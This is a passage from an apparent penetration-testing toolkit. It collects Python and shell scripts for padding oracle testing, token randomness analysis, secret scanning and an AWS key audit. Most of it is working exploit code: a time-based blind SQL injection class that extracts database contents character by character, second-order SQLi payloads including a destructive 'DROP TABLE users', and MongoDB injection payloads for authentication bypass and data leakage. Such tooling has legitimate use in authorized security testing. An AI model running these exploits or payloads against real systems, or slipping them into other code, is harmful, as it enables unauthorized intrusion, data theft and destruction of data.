            # Short ciphertext
            ciphertext[:self.block_size * 2],
        ]
        responses = []
        for test_ct in test_cases:
            start_time = time.time()
            response = self.send_ciphertext(test_ct)
            elapsed = time.time() - start_time
            responses.append({
                'ciphertext': test_ct[:32] + '...',
                'status_code': response.status_code,
                'response_time': elapsed,
                'error_keywords': self.check_error_keywords(response.text),
                'content_length': len(response.content)
            })
        return responses

    def check_error_keywords(self, response_text):
        """Return the padding-related keywords found in *response_text*
        (case-insensitive, in list order)."""
        padding_keywords = [
            'padding', 'decrypt', 'cipher', 'invalid',
            'PKCS', 'bad', 'error', 'exception',
            'malformed', 'encoding', 'cryptographic'
        ]
        lowered = response_text.lower()
        return [keyword for keyword in padding_keywords if keyword.lower() in lowered]

    def automated_exploit_test(self, session_cookie="ENCRYPTED_SESSION_VALUE"):
        """Automated test for padding oracle vulnerability.

        Args:
            session_cookie: a valid encrypted value issued by the application;
                the default is a placeholder.

        Returns:
            ``{'vulnerable': False}`` or a dict describing the timing- or
            error-based signal that was observed.
        """
        invalid_ct = self.modify_last_byte(session_cookie)

        # Test timing attacks
        timing_differences = []
        for _ in range(100):
            # Send valid request
            start = time.perf_counter()
            self.send_ciphertext(session_cookie)
            valid_time = time.perf_counter() - start
            # Send invalid padding
            start = time.perf_counter()
            self.send_ciphertext(invalid_ct)
            invalid_time = time.perf_counter() - start
            timing_differences.append(invalid_time - valid_time)
        avg_timing_diff = sum(timing_differences) / len(timing_differences)

        # A rejected padding may be answered faster *or* slower than a valid
        # one, so the magnitude is compared (10ms difference).
        if abs(avg_timing_diff) > 0.01:
            return {
                'vulnerable': True,
                'type': 'timing_based_padding_oracle',
                'average_timing_difference': avg_timing_diff
            }

        # Check for different error responses
        error_codes = set()
        for _ in range(20):
            response = self.send_ciphertext(self.generate_random_ciphertext())
            error_codes.add(response.status_code)
        if len(error_codes) > 1:
            return {
                'vulnerable': True,
                'type': 'error_based_padding_oracle',
                'different_error_codes': list(error_codes)
            }
        return {'vulnerable': False}
# Real-world example: ASP.NET Padding Oracle (MS10-070)
def test_aspnet_padding_oracle(base_url="https://target.com"):
    """Test for classic ASP.NET padding oracle.

    Requests a set of WebResource.axd URLs and reports those whose response
    body contains a padding/cryptography error marker.

    NOTE: the ``test_`` prefix means pytest collects this function if the
    module is imported into a test run.

    Args:
        base_url: scheme and host of the application (no trailing slash).

    Returns:
        The request paths that produced a padding-related error.
    """
    # ASP.NET specific tests
    test_vectors = [
        # Valid WebResource request
        "/WebResource.axd?d=VALID_ENCRYPTED_STRING",
        # Tampered request
        "/WebResource.axd?d=TAMPERED_ENCRYPTED_STRING",
        # Different error conditions
        "/WebResource.axd?d=" + "A" * 100,
        "/WebResource.axd",
    ]
    error_markers = ('Padding', 'Cryptographic', 'Bad Data')
    flagged = []
    for vector in test_vectors:
        response = requests.get(f"{base_url}{vector}", timeout=10)
        # Check for padding-related errors
        if any(marker in response.text for marker in error_markers):
            print(f"Potential padding oracle at {vector}")
            flagged.append(vector)
    return flagged
#!/usr/bin/env python3
"""
Cryptographic randomness analyzer
Tests for weak PRNG usage in session tokens, CSRF tokens, etc.
"""
import requests
import collections
import math
import statistics
from typing import List
import hashlib
class RandomnessAnalyzer:
    """Statistical checks on the randomness of tokens (session IDs, CSRF tokens...)."""

    def __init__(self):
        self.entropy_threshold = 3.0  # Minimum entropy per byte

    def collect_samples(self, target_url, sample_count=1000):
        """Collect token-like strings from repeated GETs of *target_url*.

        At most five tokens are taken per response, and requesting stops as
        soon as *sample_count* tokens have been gathered.
        """
        import re

        # Extract potential tokens (adjust regex as needed)
        token_pattern = re.compile(r'[A-Za-z0-9+/=]{20,}')
        samples = []
        for _ in range(sample_count):
            if len(samples) >= sample_count:
                break
            try:
                # Get a page that generates tokens
                response = requests.get(target_url, timeout=10)
            except requests.RequestException as e:
                print(f"Error collecting sample: {e}")
                continue
            samples.extend(token_pattern.findall(response.text)[:5])
        return samples[:sample_count]

    def analyze_entropy(self, tokens: List[str]):
        """Calculate Shannon entropy of tokens.

        Tokens shorter than 16 characters are skipped. The entropy is computed
        over the UTF-8 bytes of each token and compared with
        ``self.entropy_threshold``.
        """
        results = []
        for token in tokens:
            if len(token) < 16:
                continue
            encoded = token.encode()
            # Frequencies and total come from the same byte sequence, so the
            # probabilities sum to 1 even for non-ASCII tokens.
            total_bytes = len(encoded)
            entropy = 0.0
            for count in collections.Counter(encoded).values():
                probability = count / total_bytes
                entropy -= probability * math.log2(probability)
            results.append({
                'token': token[:20] + '...',
                'length': len(token),
                'entropy_per_byte': entropy,
                'is_weak': entropy < self.entropy_threshold
            })
        return results

    @staticmethod
    def _chi_square_critical(dof, z=1.6449):
        """Approximate the upper chi-square critical value (Wilson-Hilferty).

        ``z=1.6449`` corresponds to p=0.05; for 255 degrees of freedom this
        gives ~293, the constant used previously.
        """
        k = 2.0 / (9.0 * dof)
        return dof * (1.0 - k + z * math.sqrt(k)) ** 3

    def test_for_bias(self, tokens: List[str], alphabet=None):
        """Test for statistical bias in tokens.

        The chi-square test compares symbol frequencies with a uniform
        distribution over the token alphabet. Testing against all 256 byte
        values, as before, reports every ASCII token set as biased.

        Args:
            tokens: token strings to analyse.
            alphabet: optional string of every symbol the generator may emit;
                by default the set of observed symbols is used, which cannot
                detect symbols that never occur.

        Returns:
            ``None`` when there is nothing to analyse, otherwise a result dict.
        """
        if not tokens:
            return None
        all_bytes = b''.join(t.encode() for t in tokens)
        total_bytes = len(all_bytes)
        if total_bytes == 0:
            return None

        counts = collections.Counter(all_bytes)
        symbols = set(counts)
        if alphabet:
            symbols |= set(alphabet.encode())

        expected = total_bytes / len(symbols)
        chi_square = sum(
            (counts.get(symbol, 0) - expected) ** 2 / expected
            for symbol in symbols
        )
        dof = len(symbols) - 1
        # A single repeated symbol has no variability at all: report it as biased.
        is_biased = True if dof == 0 else chi_square > self._chi_square_critical(dof)

        # Test for sequential patterns (adjacent bytes that differ by one)
        sequential_patterns = sum(
            1 for left, right in zip(all_bytes, all_bytes[1:])
            if abs(left - right) == 1
        )
        return {
            'chi_square': chi_square,
            'is_biased': is_biased,
            'sequential_patterns': sequential_patterns,
            'sequential_ratio': sequential_patterns / total_bytes,
            'total_bytes_analyzed': total_bytes,
            'degrees_of_freedom': dof
        }

    def detect_prng_type(self, tokens: List[str]):
        """Attempt to identify the PRNG algorithm used.

        Only checker methods that exist on the instance are run; this class
        defines ``check_time_based`` and subclasses may add the others.
        """
        checker_names = {
            'LCG': 'check_lcg_pattern',
            'MT19937': 'check_mersenne_twister',
            'Java_Random': 'check_java_random',
            'time_based': 'check_time_based'
        }
        detected = []
        for label, method_name in checker_names.items():
            checker = getattr(self, method_name, None)
            if callable(checker) and checker(tokens):
                detected.append(label)
        return detected

    def check_time_based(self, tokens):
        """Return True when a token starts with a hex UNIX timestamp from the
        last 24 hours."""
        import time

        hex_digits = '0123456789abcdefABCDEF'
        current_time = int(time.time())
        for token in tokens:
            prefix = token[:8]
            if len(prefix) < 8 or not all(c in hex_digits for c in prefix):
                continue
            if abs(current_time - int(prefix, 16)) < 86400:  # Within 24 hours
                return True
        return False
# Usage
analyzer = RandomnessAnalyzer()
samples = analyzer.collect_samples("https://target.com/login", 500)
entropy_results = analyzer.analyze_entropy(samples)
bias_results = analyzer.test_for_bias(samples)
prng_type = analyzer.detect_prng_type(samples)
#!/bin/bash
# Comprehensive secret scanning across multiple sources
TARGET_DIR="/path/to/codebase"
OUTPUT_FILE="secrets_report_$(date +%Y%m%d).json"
echo "[*] Starting comprehensive secret scan..."
# 1. TruffleHog with all detectors
trufflehog filesystem "$TARGET_DIR" \
    --no-verification \
    --json | jq . > trufflehog_raw.json
# 2. Gitleaks with custom configuration
cat > .gitleaks.toml << 'EOF'
title = "gitleaks config"
[[rules]]
description = "AWS Access Key"
regex = '''(A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}'''
tags = ["key", "AWS"]
[[rules]]
description = "GitHub Token"
regex = '''gh[pousr]_[A-Za-z0-9_]{36,255}'''
tags = ["key", "GitHub"]
[[rules]]
description = "Generic API Key"
regex = '''(?i)(api[_-]?key|apikey|secret)[\s]*[=:][\s]*["']?[A-Za-z0-9]{16,64}["']?'''
tags = ["key", "API"]
EOF
gitleaks detect --source "$TARGET_DIR" \
    --config .gitleaks.toml \
    --report-format json \
    --report-path gitleaks_report.json
# 3. detect-secrets with baseline comparison
# NOTE(review): confirm that .secrets.baseline already exists before this runs,
# and that an interactive audit step is wanted in an unattended script.
detect-secrets scan "$TARGET_DIR" \
    --all-files \
    --baseline .secrets.baseline
detect-secrets audit .secrets.baseline
# 4. Custom regex scanning for business-specific secrets
cat > custom_secrets.py << 'EOF'
import re
import os
import sys
import json


def scan_for_custom_secrets(directory):
    """Return a list of findings for the custom patterns below *directory*."""
    patterns = {
        "database_url": r"postgres(ql)?://[^:\s]+:[^@\s]+@[^\s]+",
        "jwt_secret": r"(?i)(jwt|access|refresh)[_-]?(secret|key)[\s]*[:=][\s]*['\"][A-Za-z0-9+/=]{32,}['\"]",
        "encryption_key": r"(?i)(encryption|aes|des|blowfish)[_-]?(key|iv)[\s]*[:=][\s]*['\"][A-Za-z0-9+/=]{16,}['\"]",
        "private_key": r"-----BEGIN (RSA|DSA|EC|OPENSSH) PRIVATE KEY-----",
        "oauth": r"[0-9a-f]{32}-[0-9a-f]{32}",
    }
    # Compile once instead of once per file.
    compiled = {name: re.compile(rx, re.IGNORECASE) for name, rx in patterns.items()}
    extensions = ('.py', '.js', '.java', '.php', '.rb', '.go', '.yml', '.yaml', '.json', '.env')
    findings = []
    for root, dirs, files in os.walk(directory):
        for file in files:
            if not file.endswith(extensions):
                continue
            filepath = os.path.join(root, file)
            try:
                with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                    content = f.read()
            except OSError:
                # Unreadable file: skip it, keep scanning the rest.
                continue
            lines = content.split('\n')
            for secret_type, pattern in compiled.items():
                for match in pattern.finditer(content):
                    # Get context (2 lines before and after)
                    line_no = content[:match.start()].count('\n') + 1
                    context_start = max(0, line_no - 3)
                    context_end = min(len(lines), line_no + 2)
                    text = match.group()
                    findings.append({
                        "file": filepath,
                        "line": line_no,
                        "secret_type": secret_type,
                        "match": text[:50] + "..." if len(text) > 50 else text,
                        "context": '\n'.join(lines[context_start:context_end])
                    })
    return findings


if __name__ == "__main__":
    # Without this entry point the script defined the function but printed
    # nothing, leaving custom_findings.json empty.
    json.dump(scan_for_custom_secrets(sys.argv[1]), sys.stdout, indent=2)
EOF
python3 custom_secrets.py "$TARGET_DIR" > custom_findings.json
# 5. Historical secret scanning in git
# -C runs git inside the scanned repository rather than the current directory.
git -C "$TARGET_DIR" log -p | grep -E "(pass|secret|key|token|auth)" > git_history_secrets.txt
# 6. Combine all findings
# The TruffleHog file is a stream of objects while the other two are arrays,
# which `jq -s add` cannot add together; each source gets its own key instead.
jq -n \
    --slurpfile trufflehog trufflehog_raw.json \
    --slurpfile gitleaks gitleaks_report.json \
    --slurpfile custom custom_findings.json \
    '{trufflehog: $trufflehog, gitleaks: ($gitleaks | add // []), custom: ($custom | add // [])}' \
    > "$OUTPUT_FILE"
echo "[+] Secret scanning complete. Report saved to $OUTPUT_FILE"
#!/usr/bin/env python3
"""
AWS Secret Scanner - Find exposed AWS credentials
"""
import boto3
import re
import json
from datetime import datetime
from botocore.exceptions import ClientError
class AWSSecretScanner:
    """Audit IAM access keys for rotation and usage hygiene."""

    ROTATION_DAYS = 90   # keys older than this violate the rotation policy
    UNUSED_DAYS = 180    # keys idle longer than this are reported as unused

    def __init__(self, aws_profile='default'):
        """Create IAM and STS clients from the named AWS profile."""
        self.session = boto3.Session(profile_name=aws_profile)
        self.iam = self.session.client('iam')
        self.sts = self.session.client('sts')

    @staticmethod
    def _days_since(moment):
        """Return whole days elapsed since *moment*.

        "Now" is taken in *moment*'s own time zone. Stripping the zone and
        subtracting from local naive time skews the age by the UTC offset.
        """
        return (datetime.now(moment.tzinfo) - moment).days

    def scan_for_exposed_keys(self):
        """Scan for potentially exposed AWS keys.

        Returns:
            A list of finding dicts: HIGH for keys older than the rotation
            period, MEDIUM for keys unused longer than the idle period.
        """
        findings = []
        # 1. List all IAM users (paginated, so large accounts are fully covered)
        for page in self.iam.get_paginator('list_users').paginate():
            for user in page['Users']:
                username = user['UserName']
                # 2. Get access keys for each user
                try:
                    keys = self.iam.list_access_keys(UserName=username)
                    for key in keys['AccessKeyMetadata']:
                        findings.extend(self._evaluate_key(username, key))
                except ClientError as e:
                    print(f"Error checking keys for {username}: {e}")
        return findings

    def _evaluate_key(self, username, key):
        """Return the findings for one access-key metadata record."""
        key_id = key['AccessKeyId']
        # 3. Check key age
        key_age = self._days_since(key['CreateDate'])
        # 4. Check last used; a key that was never used counts as idle since
        #    its creation.
        days_since_use = key_age
        try:
            last_used = self.iam.get_access_key_last_used(AccessKeyId=key_id)
            last_used_date = last_used['AccessKeyLastUsed'].get('LastUsedDate')
            if last_used_date:
                days_since_use = self._days_since(last_used_date)
        except ClientError:
            # Best effort: fall back to the key age when the lookup is denied.
            pass

        shared = {
            'user': username,
            'key_id': key_id,
            'status': key['Status'],
            'key_age_days': key_age,
            'last_used_days': days_since_use
        }
        findings = []
        # 5. Check for rotation policy violation
        if key_age > self.ROTATION_DAYS:
            findings.append({
                'severity': 'HIGH',
                'issue': f'Access key not rotated in {key_age} days',
                **shared
            })
        # 6. Check for unused keys
        if days_since_use > self.UNUSED_DAYS:
            findings.append({
                'severity': 'MEDIUM',
                'issue': f'Access key unused for {days_since_use} days',
                **shared
            })
        return findings

    def check_key_exposure(self, key_id, secret_key):
        """Check if key is exposed (placeholder).

        No lookup is performed yet: the result always reports ``exposed`` as
        False with no indicators, and *secret_key* is not used.
        """
        return {
            'key_id': key_id,
            'exposed': False,  # Placeholder
            'indicators': []
        }

    def generate_remediation(self, findings):
        """Generate remediation steps for every HIGH-severity finding."""
        remediation = []
        for finding in findings:
            if finding['severity'] != 'HIGH':
                continue
            user, key_id = finding['user'], finding['key_id']
            remediation.append({
                'action': f"Rotate access key {key_id} for user {user}",
                'steps': [
                    f"Create new access key for {user}",
                    f"Update applications using {key_id}",
                    f"Disable {key_id} after migration",
                    f"Delete {key_id} after 7 days"
                ]
            })
        return remediation
# Usage
scanner = AWSSecretScanner('production')
findings = scanner.scan_for_exposed_keys()
remediation = scanner.generate_remediation(findings)
print(json.dumps(findings, indent=2, default=str))
#!/usr/bin/env python3
"""
Advanced Time-Based Blind SQL Injection Exploitation
Supports multiple databases with conditional timing
"""
import requests
import time
import string
from urllib.parse import quote
from concurrent.futures import ThreadPoolExecutor, as_completed
class TimeBasedSQLi:
    """Time-based blind SQL injection tester (authorized testing only).

    A condition is evaluated by injecting a database sleep that only fires
    when the condition holds, then checking whether the HTTP request took
    at least ``delay - threshold`` seconds.
    """

    # Upper bound of the per-character binary search (7-bit ASCII).
    _MAX_CODE_POINT = 127

    def __init__(self, target_url, param_name, injection_point):
        """Store the target description and build per-database payloads.

        Args:
            target_url: URL of the endpoint under test.
            param_name: Query parameter or cookie name to inject into.
            injection_point: ``'query'`` or ``'cookie'``; any other value
                makes ``build_url`` substitute the ``INJECTION_POINT``
                marker inside ``target_url``.
        """
        self.target_url = target_url
        self.param_name = param_name
        self.injection_point = injection_point
        self.delay = 5  # Base delay in seconds
        self.threshold = 0.5  # Time difference threshold
        self.session = requests.Session()
        # Database-specific payloads
        self.db_payloads = {
            'mysql': {
                'true': f"SLEEP({self.delay})",
                'false': "SLEEP(0)",
                'conditional': f"IF({{condition}},SLEEP({self.delay}),SLEEP(0))"
            },
            'postgresql': {
                'true': f"pg_sleep({self.delay})",
                'false': "pg_sleep(0)",
                'conditional': f"CASE WHEN {{condition}} THEN pg_sleep({self.delay}) ELSE pg_sleep(0) END"
            },
            'mssql': {
                'true': f"WAITFOR DELAY '0:0:{self.delay}'",
                'false': "WAITFOR DELAY '0:0:0'",
                'conditional': f"; IF {{condition}} WAITFOR DELAY '0:0:{self.delay}'--"
            },
            'oracle': {
                'true': f"dbms_pipe.receive_message('a',{self.delay})",
                'false': "dbms_pipe.receive_message('a',0)",
                'conditional': f"BEGIN IF {{condition}} THEN dbms_pipe.receive_message('a',{self.delay}); ELSE dbms_pipe.receive_message('a',0); END IF; END;"
            }
        }

    def _is_delayed(self, url):
        """Return True when a GET to ``url`` takes ``delay - threshold`` s or more.

        Request errors propagate to the caller, which decides how to react.
        """
        started = time.monotonic()
        self.session.get(url, timeout=self.delay + 2)
        return time.monotonic() - started >= self.delay - self.threshold

    def detect_database(self):
        """Identify the database type.

        Returns:
            The first key of ``db_payloads`` whose unconditional sleep
            payload delays the response, or ``None`` when none does.
        """
        for db_type, payloads in self.db_payloads.items():
            test_url = self.build_url(f"' OR {payloads['true']}--")
            try:
                if self._is_delayed(test_url):
                    return db_type
            except requests.RequestException:
                # A failed request says nothing about this engine; try the next.
                continue
        return None

    def _find_code_point(self, template, query, position):
        """Binary-search the code point of one character of the query result.

        Returns:
            The code point in ``0.._MAX_CODE_POINT`` (0 means "no character
            at this position"), or ``None`` when a request failed.
        """
        low, high = 0, self._MAX_CODE_POINT
        while low < high:
            mid = (low + high) // 2
            # Build condition: ASCII value comparison
            condition = f"ASCII(SUBSTRING(({query}),{position},1)) > {mid}"
            payload = template.format(condition=condition)
            test_url = self.build_url(f"' OR {payload}--")
            try:
                delayed = self._is_delayed(test_url)
            except Exception as e:
                print(f"Error: {e}")
                return None
            if delayed:
                low = mid + 1  # value is above mid
            else:
                high = mid  # value is mid or below
        return low

    def extract_data(self, query, db_type):
        """Extract a query result character by character using binary search.

        The search runs over numeric code points rather than over an
        unordered character list, and stops at the first position whose
        code point is 0 (past the end of the value) or when a request fails.

        Args:
            query: SQL sub-query whose scalar result is read.
            db_type: Key into ``db_payloads``; unknown keys raise ``KeyError``.

        Returns:
            The characters recovered so far (possibly empty).
        """
        template = self.db_payloads[db_type]['conditional']
        result = ""
        position = 1
        while True:
            code = self._find_code_point(template, query, position)
            if not code:  # None (request error) or 0 (end of value)
                break
            result += chr(code)
            print(f"[+] Found: {result}")
            position += 1
        return result

    def parallel_extraction(self, queries, db_type, max_workers=5):
        """Extract multiple pieces of data in parallel.

        NOTE(review): all workers share ``self.session`` and the same
        target, so concurrent sleeps may skew each other's timings —
        confirm results with ``max_workers=1`` when in doubt.

        Returns:
            Dict mapping each query to its extracted string, or to an
            ``"Error: ..."`` string when extraction raised.
        """
        results = {}
        with ThreadPoolExecutor(max_workers=max_workers) as executor:
            future_to_query = {
                executor.submit(self.extract_data, query, db_type): query
                for query in queries
            }
            for future in as_completed(future_to_query):
                query = future_to_query[future]
                try:
                    results[query] = future.result()
                except Exception as e:
                    results[query] = f"Error: {e}"
        return results

    def build_url(self, payload):
        """Construct the target URL with injection.

        For ``'cookie'`` the payload is stored on the session's cookie jar
        as a side effect and the plain target URL is returned.
        """
        if self.injection_point == 'query':
            return f"{self.target_url}?{self.param_name}={quote(payload)}"
        if self.injection_point == 'cookie':
            self.session.cookies.set(self.param_name, payload)
            return self.target_url
        return self.target_url.replace('INJECTION_POINT', quote(payload))
# Usage example: fingerprint the backend, then read a few values from it.
sqli = TimeBasedSQLi(
    target_url="http://target.com/search",
    param_name="q",
    injection_point="query"
)

# Detect database
db_type = sqli.detect_database()
print(f"[*] Detected database: {db_type}")

# Extract data
queries = [
    "SELECT user()",
    "SELECT database()",
    "SELECT @@version",
    "SELECT table_name FROM information_schema.tables LIMIT 5"
]
results = sqli.parallel_extraction(queries, db_type)
for query, result in results.items():
    print(f"[*] {query}: {result}")
#!/usr/bin/env python3
"""
Second-Order SQL Injection Detection
Tests for stored/triggered SQL injection attacks
"""
import requests
import time
from urllib.parse import urljoin
class SecondOrderSQLiDetector:
    """Detect stored (second-order) SQL injection in authorized tests.

    Each flow stores a payload through one endpoint, then requests a second
    endpoint that may use the stored value, looking for an injected delay
    or SQL error text in the second response.
    """

    # Seconds above which the trigger request counts as time-based evidence.
    DELAY_THRESHOLD = 5

    def __init__(self, base_url, session_cookies=None):
        """Create the HTTP session and the payload list.

        Args:
            base_url: Base URL that endpoint paths are joined onto.
            session_cookies: Optional cookies merged into the session.
        """
        self.base_url = base_url
        self.session = requests.Session()
        if session_cookies:
            self.session.cookies.update(session_cookies)
        self.payloads = [
            # Classic second-order payloads
            "admin'--",
            "admin' OR '1'='1",
            # NOTE(review): destructive if it ever executes; only keep this
            # entry when the rules of engagement explicitly allow data loss.
            "test'; DROP TABLE users--",
            # Time-based for detection
            "test'; WAITFOR DELAY '0:0:5'--",
            "test' AND SLEEP(5)--",
            # Error-based
            "test' AND 1=CONVERT(int, @@version)--",
            # Union-based (for when triggered)
            "test' UNION SELECT NULL--"
        ]

    def _timing_payloads(self):
        """Return the payloads that contain a delay primitive."""
        markers = ('SLEEP(', 'WAITFOR DELAY')
        return [
            payload for payload in self.payloads
            if any(marker in payload.upper() for marker in markers)
        ]

    def test_registration_flow(self):
        """Test user registration -> login flow.

        Returns:
            List of finding dicts (``type`` is ``time_based`` or
            ``error_based``).
        """
        findings = []
        register_url = urljoin(self.base_url, '/register')
        login_url = urljoin(self.base_url, '/login')
        for payload in self.payloads:
            print(f"[*] Testing payload: {payload}")
            email = f'{payload}@test.com'
            # 1. Register with the payload embedded in the e-mail field
            reg_response = self.session.post(register_url, data={
                'username': f'test_{int(time.time())}',
                'email': email,
                'password': 'Password123!'
            })
            if reg_response.status_code == 200:
                # 2. Attempt login (might trigger second-order)
                start_time = time.time()
                login_response = self.session.post(login_url, data={
                    'email': email,
                    'password': 'Password123!'
                })
                elapsed = time.time() - start_time
                # 3. Analyze response
                if elapsed > self.DELAY_THRESHOLD:
                    findings.append({
                        'type': 'time_based',
                        'payload': payload,
                        'delay': elapsed,
                        'vector': 'registration->login'
                    })
                body = login_response.text.lower()
                if 'error' in body and 'sql' in body:
                    findings.append({
                        'type': 'error_based',
                        'payload': payload,
                        'response_snippet': login_response.text[:200],
                        'vector': 'registration->login'
                    })
            time.sleep(1)  # Rate limiting
        return findings

    def test_profile_update(self):
        """Test profile update -> display flow.

        Registers and logs in a fixed test account, then stores each payload
        in the profile and re-reads the profile page.
        """
        findings = []
        # First, create a normal user
        self.session.post(
            urljoin(self.base_url, '/register'),
            data={
                'username': f'victim_{int(time.time())}',
                'email': 'victim@test.com',
                'password': 'Password123!'
            }
        )
        # Login
        self.session.post(
            urljoin(self.base_url, '/login'),
            data={'email': 'victim@test.com', 'password': 'Password123!'}
        )
        update_url = urljoin(self.base_url, '/profile/update')
        profile_url = urljoin(self.base_url, '/profile')
        for payload in self.payloads:
            update_response = self.session.post(update_url, data={
                'display_name': payload,
                'bio': f'Bio with {payload}'
            })
            if update_response.status_code != 200:
                continue
            # View profile (might trigger second-order)
            start_time = time.time()
            profile_response = self.session.get(profile_url)
            elapsed = time.time() - start_time
            if elapsed > self.DELAY_THRESHOLD:
                findings.append({
                    'type': 'time_based',
                    'payload': payload,
                    'delay': elapsed,
                    'vector': 'profile_update->display'
                })
            body = profile_response.text.lower()
            if any(err in body for err in ['sql', 'database', 'syntax']):
                findings.append({
                    'type': 'error_based',
                    'payload': payload,
                    'vector': 'profile_update->display'
                })
        return findings

    def automated_detection(self):
        """Run all second-order SQLi tests and return the merged findings."""
        all_findings = []
        print("[*] Testing registration -> login flow")
        all_findings.extend(self.test_registration_flow())
        print("[*] Testing profile update -> display flow")
        all_findings.extend(self.test_profile_update())
        # Additional test vectors: (create endpoint, parameter, trigger endpoint)
        test_vectors = [
            ('/comment', 'content', '/comments'),  # Comment -> display
            ('/product/review', 'review', '/product'),  # Review -> product page
            ('/ticket/create', 'description', '/ticket/view')  # Ticket create -> view
        ]
        for create_endpoint, param_name, trigger_endpoint in test_vectors:
            print(f"[*] Testing {create_endpoint} -> {trigger_endpoint}")
            all_findings.extend(
                self.test_generic_flow(create_endpoint, param_name, trigger_endpoint)
            )
        return all_findings

    def test_generic_flow(self, create_endpoint, param_name, trigger_endpoint):
        """Test a generic create -> trigger flow.

        Only a response delay is checked here, so only the payloads that
        carry a delay primitive are sent; the other payloads could never
        produce a finding in this flow.
        """
        findings = []
        create_url = urljoin(self.base_url, create_endpoint)
        trigger_url = urljoin(self.base_url, trigger_endpoint)
        for payload in self._timing_payloads():
            # Create resource with payload
            create_response = self.session.post(
                create_url,
                data={param_name: payload, 'title': 'Test'}
            )
            if create_response.status_code not in [200, 201]:
                continue
            # Trigger the second-order
            start_time = time.time()
            self.session.get(trigger_url)
            elapsed = time.time() - start_time
            if elapsed > self.DELAY_THRESHOLD:
                findings.append({
                    'type': 'time_based',
                    'payload': payload,
                    'delay': elapsed,
                    'vector': f'{create_endpoint}->{trigger_endpoint}'
                })
        return findings
# Usage: run every second-order flow against the target and list the hits.
detector = SecondOrderSQLiDetector("http://target.com")
findings = detector.automated_detection()
for finding in findings:
    print(f"[!] Found second-order SQLi: {finding}")
#!/usr/bin/env python3
"""
Advanced MongoDB NoSQL Injection Testing
Covers aggregation pipelines, $function, MapReduce, etc.
"""
import requests
import json
from urllib.parse import quote
class MongoDBInjector:
    """MongoDB / NoSQL injection tester for authorized assessments."""

    def __init__(self, target_url, param_name='query'):
        """Store the target and build the payload catalogue.

        Args:
            target_url: Endpoint that receives the payloads.
            param_name: Request parameter / JSON key carrying the payload.
        """
        self.target_url = target_url
        self.param_name = param_name
        self.session = requests.Session()
        # Advanced MongoDB payloads (each entry is a JSON document as text)
        self.payloads = {
            'authentication_bypass': [
                # Classic
                '{"$ne": null}',
                '{"$gt": ""}',
                '{"$regex": ".*"}',
                # Using $where with JavaScript
                '{"$where": "true"}',
                '{"$where": "1 == 1"}',
                # Using $expr
                '{"$expr": {"$eq": [1, 1]}}',
            ],
            'data_extraction': [
                # Extract all documents
                '{"$where": "this.username == \\\"admin\\\""}',
                # Using $function in aggregation
                '{"$function": "function() { return this.password; }"}',
                # MapReduce injection
                '{"map": "function() { emit(this.username, this.password); }"}',
            ],
            'javascript_execution': [
                # Direct JavaScript execution
                '{"$where": "sleep(5000) || true"}',
                '{"$where": "d = new Date(); do {cur = new Date();} while(cur - d < 5000)"}',
                # Using $function with sleep
                '{"$function": "function() { var d = new Date(); while(new Date() - d < 5000) {}; return true; }"}',
            ],
            'aggregation_pipeline': [
                # Malicious aggregation stages
                '[{"$match": {"username": {"$ne": null}}}, {"$project": {"password": 1}}]',
                # Using $addFields to leak data
                '[{"$addFields": {"leaked": "$password"}}]',
                # $lookup with malicious pipeline
                '[{"$lookup": {"from": "users", "pipeline": [{"$project": {"password": 1}}], "as": "leaked"}}]',
            ]
        }

    def test_injection_point(self, method='GET', data_type='json'):
        """Test for NoSQL injection vulnerabilities.

        Args:
            method: ``'GET'`` sends the payload URL-encoded in the query
                string; anything else sends a POST.
            data_type: For POST, ``'json'`` embeds the parsed payload in a
                JSON body; any other value sends form data.

        Returns:
            List of dicts describing payloads judged successful by
            ``is_successful_injection``.
        """
        vulnerabilities = []
        for category, payload_list in self.payloads.items():
            for payload in payload_list:
                print(f"[*] Testing {category}: {payload[:50]}...")
                if method.upper() == 'GET':
                    # URL encode for GET
                    test_url = f"{self.target_url}?{self.param_name}={quote(payload)}"
                    response = self.session.get(test_url)
                else:
                    # POST with different content types
                    if data_type == 'json':
                        headers = {'Content-Type': 'application/json'}
                        data = json.dumps({self.param_name: json.loads(payload)})
                    else:  # form data
                        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
                        data = {self.param_name: payload}
                    response = self.session.post(
                        self.target_url,
                        data=data,
                        headers=headers
                    )
                # Analyze response
                if self.is_successful_injection(response, category):
                    vulnerabilities.append({
                        'category': category,
                        'payload': payload,
                        'status_code': response.status_code,
                        'response_time': response.elapsed.total_seconds(),
                        'indicators': self.extract_indicators(response)
                    })
        return vulnerabilities

    def is_json(self, response):
        """Return True when the response body parses as JSON."""
        try:
            response.json()
        except ValueError:
            return False
        return True

    def extract_indicators(self, response):
        """List which of the signals used by this class the response shows.

        Returns:
            List of strings: matched keywords, plus ``'slow_response'``
            when the response took more than 5 seconds.
        """
        text = response.text
        lowered = text.lower()
        found = [word for word in ('password', 'email', 'timeout') if word in lowered]
        found += [word for word in ('admin', 'logout', 'Welcome') if word in text]
        if response.elapsed.total_seconds() > 5:
            found.append('slow_response')
        return found

    def is_successful_injection(self, response, category):
        """Determine if injection was successful.

        Only the checks of the requested category are evaluated. Categories
        without checks (e.g. ``aggregation_pipeline``) return False.

        NOTE(review): the ``authentication_bypass`` rule is true for almost
        any response (any 200/302, or any body lacking "Invalid
        credentials"); confirm hits manually.
        """
        text = response.text
        lowered = text.lower()
        if category == 'authentication_bypass':
            return (
                response.status_code in [200, 302]
                or 'logout' in text
                or 'Welcome' in text
                or 'Invalid credentials' not in text
            )
        if category == 'data_extraction':
            if 'password' in lowered or 'email' in lowered or 'admin' in text:
                return True
            if not self.is_json(response):
                return False
            body = response.json()
            # Scalars (numbers, booleans, null) have no length.
            return hasattr(body, '__len__') and len(body) > 0
        if category == 'javascript_execution':
            return response.elapsed.total_seconds() > 5 or 'timeout' in lowered
        return False

    def blind_injection(self, conditional_payloads):
        """Perform blind NoSQL injection, one character at a time.

        NOTE(review): the ``$where`` condition sent here contains no delay,
        so the 2-second threshold only fires if the server is naturally
        slower on a match — confirm the intended oracle.

        Args:
            conditional_payloads: Accepted for interface compatibility;
                not used.

        Returns:
            The characters identified before the first position with no
            match (possibly empty).
        """
        import time  # this script's import block does not provide it

        extracted_data = ""
        charset = "abcdefghijklmnopqrstuvwxyz0123456789"
        for i in range(1, 51):  # Extract up to 50 characters
            found_char = None
            for char in charset:
                # Condition: character at (0-based) position i-1 equals char
